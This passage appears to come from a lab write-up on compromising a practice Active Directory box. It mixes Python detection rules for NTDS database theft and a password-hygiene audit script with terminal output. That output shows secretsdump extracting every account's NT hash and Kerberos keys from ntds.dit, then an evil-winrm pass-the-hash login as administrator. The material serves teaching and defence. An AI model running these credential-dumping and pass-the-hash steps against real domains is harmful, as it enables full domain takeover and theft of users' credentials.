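            and "SeBackupPrivilege" in ev.get("PrivilegeList", "").split()
            and ev["SubjectUserName"] not in EXPECTED_BACKUP_HOLDERS)


def rule_shadow_copy_tooling(ev):
    """4688: a shadow-copy utility was started."""
    return ev["EventID"] == 4688 and _image(ev) in {"diskshadow.exe", "vssadmin.exe"}


def rule_backup_mode_copy_of_ntds(ev):
    """4688: robocopy in backup mode (/b) touching the NTDS database."""
    cl = _cmdline(ev)
    return (ev["EventID"] == 4688 and _image(ev) == "robocopy.exe"
            and "/b" in cl.split() and "ntds" in cl)


def rule_registry_hive_export(ev):
    """4688: reg save of a hive needed to decrypt SAM or NTDS secrets."""
    cl = _cmdline(ev)
    return (ev["EventID"] == 4688 and _image(ev) == "reg.exe"
            and "save" in cl.split()
            and re.search(r"hklm\\(system|sam|security)\b", cl) is not None)


RULES = {
    "unexpected_backup_privilege": rule_unexpected_backup_privilege,
    "shadow_copy_tooling": rule_shadow_copy_tooling,
    "backup_mode_copy_of_ntds": rule_backup_mode_copy_of_ntds,
    "registry_hive_export": rule_registry_hive_export,
}


def run_rules(events):
    """Return [(user, rule_name)] for every event that matches a rule."""
    return [(ev["SubjectUserName"], name)
            for ev in events for name, rule in RULES.items() if rule(ev)]


def correlate(events, min_rules=3):
    """Users who tripped at least min_rules distinct rules: the chain, not one event."""
    per_user = defaultdict(set)
    for user, name in run_rules(events):
        per_user[user].add(name)
    return {u for u, names in per_user.items() if len(names) >= min_rules}


if __name__ == "__main__":
    print(run_rules(SAMPLE_EVENTS))
    print(correlate(SAMPLE_EVENTS))
```

The per-user correlation is what keeps this usable: a lone robocopy /b or reg save is routine on many servers, but one account producing an unexpected SeBackupPrivilege logon, a shadow copy and a copy of ntds.dit within a short window is the sequence shown above and little else.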
*Evil-WinRM* PS C:\Temp>
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# impacket-secretsdump -ntds ntds.dit -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x9aec2145c768b9975d683cbd0b2138e0
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: ca0a78b7f0d8e8d570163049c1742318
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYAD$:1000:aad3b435b51404eeaad3b435b51404ee:1eb9a569e97548b6a4629f64979a193c:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6fab09b974ecbb7ba5447a076f494689:::
wackymaker:1104:aad3b435b51404eeaad3b435b51404ee:838e18ea954162b03ddea84fa0284139:::
babyad.com\babyad-admin:1105:aad3b435b51404eeaad3b435b51404ee:656d231c131a8f1ea8fd1138b8185674:::
backup-opt:1106:aad3b435b51404eeaad3b435b51404ee:5ad41e36af059c77865edbc22925c33c:::
server-opt:1107:aad3b435b51404eeaad3b435b51404ee:d99f9d8da6dad6dcae6b0d96104a445b:::
accn-opt:1108:aad3b435b51404eeaad3b435b51404ee:b9a7a7fcc60bdb049811e7c7388112a3:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:0218bc05d978eff9d49b5578b0b82d2b6f6fd19b47b55f91c07a555dac208574
Administrator:aes128-cts-hmac-sha1-96:4f3a074e29171c06ab3db041c1be2128
Administrator:des-cbc-md5:34701ccb6efb9704
BABYAD$:aes256-cts-hmac-sha1-96:37cbade9fb078f11a30748756fd92ff7c64af78ca036f546c7ee10326ee3cf20
BABYAD$:aes128-cts-hmac-sha1-96:d896106e4587e25cb645b44c5f2aef0c
BABYAD$:des-cbc-md5:d3b02ac8106ba89e
krbtgt:aes256-cts-hmac-sha1-96:d24121bf2b99d3645b4d7360107674ba6e9f3c55ba79d3d508906e29f1e8a81e
krbtgt:aes128-cts-hmac-sha1-96:5ed92e70800a8bc3da8e8a9220807d5e
krbtgt:des-cbc-md5:2546020262f197a7
wackymaker:aes256-cts-hmac-sha1-96:9f8fc1b72c86c3881697938460386a078d0e062c07773f60961b5ef037571977
wackymaker:aes128-cts-hmac-sha1-96:2ef671fea3cbc6a11689c264636cf316
wackymaker:des-cbc-md5:0b7a079edae54c9e
babyad.com\babyad-admin:aes256-cts-hmac-sha1-96:29f8a0be305a6a998fd0cb2798e3701f971370c9131d3e2369a13e2750130bc5
babyad.com\babyad-admin:aes128-cts-hmac-sha1-96:63a252cbc4cdc9ceeadea523d04b6673
babyad.com\babyad-admin:des-cbc-md5:f4983204910dbc62
backup-opt:aes256-cts-hmac-sha1-96:e6bd82c49938190ac40fc85355f3c1bb4e8d9739b2e33f9f7d9966b9664cbc12
backup-opt:aes128-cts-hmac-sha1-96:37dc64a75ed9200fcbf844e2d0f4c3ed
backup-opt:des-cbc-md5:98e68c7c892a1fe5
server-opt:aes256-cts-hmac-sha1-96:58ce476e9085de94eefb9fde291703bc6bfc98085f9130fca1af4f17cc9f2f54
server-opt:aes128-cts-hmac-sha1-96:83694fead3994f8afe47736c447dd676
server-opt:des-cbc-md5:2f91d026abdaae08
accn-opt:aes256-cts-hmac-sha1-96:3c0003e231985e6cefb136450c1e3c2c597377f15156402e76c503f7604f5949
accn-opt:aes128-cts-hmac-sha1-96:bfe789b2a8141a2081540ac6262424a9
accn-opt:des-cbc-md5:457acdf425c80d68
[*] Cleaning up...
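secretsdump's line format (domain\uid:rid:lmhash:nthash:::) is also a convenient input for auditing what a dump like this reveals about password hygiene. As an added example (not from the write-up and not part of Impacket), this Python parses a constructed dump with placeholder hashes and reports accounts with an empty NT hash, accounts that still have an LM hash stored, and groups of accounts sharing one NT hash. The two well-known constants (the empty LM hash and the NT hash of the empty password) are real; every other hash and account name below is made up.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when LM hash storage is off
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Constructed dump in secretsdump's format; all non-constant hashes are placeholders.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
example.test\\ops-admin:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy-svc:1106:00112233445566778899aabbccddeeff:bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb:::
[*] Kerberos keys from ntds.dit
"""

# Optional "domain\" prefix, then name:rid:lm:nt:::
LINE_RE = re.compile(r"^(?:[^\\:]+\\)?([^:\\]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)


def parse_dump(text):
    """Return {account: {"rid": int, "lm": str, "nt": str}} from secretsdump-style lines."""
    entries = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            name, rid, lm, nt = m.groups()
            entries[name] = {"rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}
    return entries


def audit(entries):
    """Hygiene findings: empty passwords, LM hashes still stored, passwords shared across accounts."""
    by_nt = defaultdict(list)
    for name, e in entries.items():
        by_nt[e["nt"]].append(name)
    return {
        # Empty NT hash: the account (often a disabled Guest, but not always) has no password.
        "empty_password": sorted(n for n, e in entries.items() if e["nt"] == EMPTY_NT),
        # A real LM hash means the password was stored in the trivially crackable LM form.
        "lm_hash_stored": sorted(n for n, e in entries.items() if e["lm"] != EMPTY_LM),
        # Same NT hash on two accounts means the same password, e.g. an admin reusing their user password.
        "shared_password": sorted(sorted(names) for names in by_nt.values() if len(names) > 1),
    }


if __name__ == "__main__":
    print(audit(parse_dump(SAMPLE_DUMP)))
```

The dump format does not say whether an account is enabled (secretsdump's -user-status option adds that), so an empty-password hit on Guest is usually noise while the same hit on a service account is not. Whatever the audit finds, once ntds.dit has left the DC every key in it is compromised, the krbtgt keys included, and the standard response is a full credential reset with krbtgt rotated twice.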
┌──(root㉿kali)-[~/Desktop/machines/babyAD]
└─# evil-winrm -i 192.168.1.5 -u administrator -H bbabdc192282668fe5190ab0c5150b34
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
babyad0\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> gc ../desktop/root.txt
6e9d14c2b7f08a53
*Evil-WinRM* PS C:\Users\Administrator\Documents>